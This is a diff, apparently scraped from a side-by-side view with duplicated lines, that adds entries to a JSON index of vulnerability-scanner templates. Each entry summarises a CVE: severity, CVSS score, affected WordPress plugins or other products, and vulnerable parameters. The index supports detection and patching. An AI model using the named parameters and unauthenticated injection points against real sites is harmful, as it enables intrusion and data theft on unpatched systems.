{"ID":"CVE-2021-24862","Info":{"Name":"WordPress RegistrationMagic \u003c5.0.1.6 - Authenticated SQL Injection","Severity":"high","Description":"WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24862.yaml"}
|
{"ID":"CVE-2021-24862","Info":{"Name":"WordPress RegistrationMagic \u003c5.0.1.6 - Authenticated SQL Injection","Severity":"high","Description":"WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24862.yaml"}
|
||||||
{"ID":"CVE-2021-24875","Info":{"Name":"WordPress eCommerce Product Catalog \u003c3.0.39 - Cross-Site Scripting","Severity":"medium","Description":"WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24875.yaml"}
|
{"ID":"CVE-2021-24875","Info":{"Name":"WordPress eCommerce Product Catalog \u003c3.0.39 - Cross-Site Scripting","Severity":"medium","Description":"WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24875.yaml"}
|
||||||
{"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24891.yaml"}
|
{"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24891.yaml"}
|
||||||
|
@ -1178,6 +1181,7 @@
|
||||||
{"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24926.yaml"}
|
{"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24926.yaml"}
|
||||||
{"ID":"CVE-2021-24931","Info":{"Name":"WordPress Secure Copy Content Protection and Content Locking \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24931.yaml"}
|
{"ID":"CVE-2021-24931","Info":{"Name":"WordPress Secure Copy Content Protection and Content Locking \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24931.yaml"}
|
||||||
{"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24940.yaml"}
|
{"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24940.yaml"}
|
||||||
|
{"ID":"CVE-2021-24943","Info":{"Name":"Registrations for the Events Calendar \u003c 2.7.6 - SQL Injection","Severity":"critical","Description":"The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24943.yaml"}
|
||||||
{"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24946.yaml"}
|
{"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24946.yaml"}
|
||||||
{"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"}
|
{"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"}
|
||||||
{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"}
|
{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"}
|
||||||
|
@ -2167,6 +2171,7 @@
|
||||||
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
|
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
|
||||||
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
|
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
|
||||||
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
|
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
|
||||||
|
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
|
||||||
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
|
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
|
||||||
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
|
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
|
||||||
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
|
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
|
||||||
|
@ -2196,6 +2201,7 @@
|
||||||
{"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"}
|
{"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"}
|
||||||
{"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"}
|
{"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"}
|
||||||
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
|
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
|
||||||
|
{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"}
|
||||||
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
|
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
|
||||||
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
|
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
|
||||||
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
|
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
|
||||||
|
@ -2217,6 +2223,7 @@
|
||||||
{"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"}
|
{"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"}
|
||||||
{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
|
{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
|
||||||
{"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"}
|
{"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"}
|
||||||
|
{"ID":"CVE-2023-42344","Info":{"Name":"OpenCMS - XML external entity (XXE)","Severity":"high","Description":"users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42344.yaml"}
|
||||||
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
|
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
|
||||||
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
|
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
|
||||||
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
|
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
|
||||||
|
@ -2230,6 +2237,7 @@
|
||||||
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
|
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
|
||||||
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
|
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
|
||||||
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
|
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
|
||||||
|
{"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"}
|
||||||
{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
|
